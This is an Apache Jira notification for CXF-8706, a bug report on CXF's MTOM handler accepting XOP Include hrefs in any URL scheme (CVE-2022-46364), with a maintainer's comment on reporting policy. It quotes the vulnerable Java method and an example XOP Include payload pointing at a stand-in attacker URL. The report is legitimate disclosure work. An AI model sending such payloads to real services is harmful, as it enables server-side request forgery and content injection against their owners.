[
https://issues.apache.org/jira/browse/CXF-8706?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17651023#comment-17651023
]
Andriy Redko edited comment on CXF-8706 at 12/21/22 11:38 PM:
--------------------------------------------------------------
Thanks [~cqlin]
> Did this prompted the new CVE-2022-46364: Apache CXF SSRF Vulnerability?
Not sure if I understand the question, but arbitrary data sources are disabled
by default, w/o any MTOM enablement mechanism.
> In the future, is there any better channel than this public Jira to report
> such vulnerability? I have been kind of worried in the last few months that
> this information is publicly available.
Since we are ASF project, the [https://www.apache.org/security/] policy
regarding vulnerabilities reporting applies.
was (Author: reta):
Thanks [~cqlin]
> Did this prompted the new CVE-2022-46364: Apache CXF SSRF Vulnerability?
No sure if I understand the question, but arbitrary data sources are disabled
by default, w/o any MTOM enablement mechanism.
> In the future, is there any better channel than this public Jira to report
> such vulnerability? I have been kind of worried in the last few months that
> this information is publicly available.
Since we are ASF project, the [https://www.apache.org/security/] policy
regarding vulnerabilities reporting applies.
> CXF MTOM handler allow content injection
> ----------------------------------------
>
> Key: CXF-8706
> URL: https://issues.apache.org/jira/browse/CXF-8706
> Project: CXF
> Issue Type: Bug
> Components: JAXB Databinding
> Affects Versions: 3.5.2
> Reporter: Chunqing Lin
> Assignee: Andriy Redko
> Priority: Major
> Fix For: 3.4.10, 3.5.5, 4.0.0, 3.6.0
>
>
> When used with SOAP web service or JAXRS web service with MTOM enabled,
> Unmarshaller allows XOP Include tag to have href attributes that allow any
> protocols. According to the W3C MTOM spec, only "cid:" should be allowed for
> href scheme.
> The affected call stack is:
> AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>)
> line: 554
> JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49
> MTOMDecorator.startElement(TagName) line: 70
> The source code is:
> public static DataSource getAttachmentDataSource(String contentId,
> Collection<Attachment> atts) {
> // Is this right? - DD
> if (contentId.startsWith("cid:")) {
> try {
> contentId = URLDecoder.decode(contentId.substring(4),
> StandardCharsets.UTF_8.name());
> } catch (UnsupportedEncodingException ue) {
> contentId = contentId.substring(4);
> }
> return loadDataSource(contentId, atts);
> } else if (contentId.indexOf("://") == -1) {
> return loadDataSource(contentId, atts);
> } else {// should only take cid for XOP
> try {
> return new URLDataSource(new URL(contentId));
> } catch (MalformedURLException e) {
> throw new Fault(e);
> }
> }
> }
>
> The exploit can send payload containing:
> <stringvalue><inc:Include href="http://attackers.site/exploit/payload";
> xmlns:inc="http://www.w3.org/2004/08/xop/include"/><stringvalue>
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
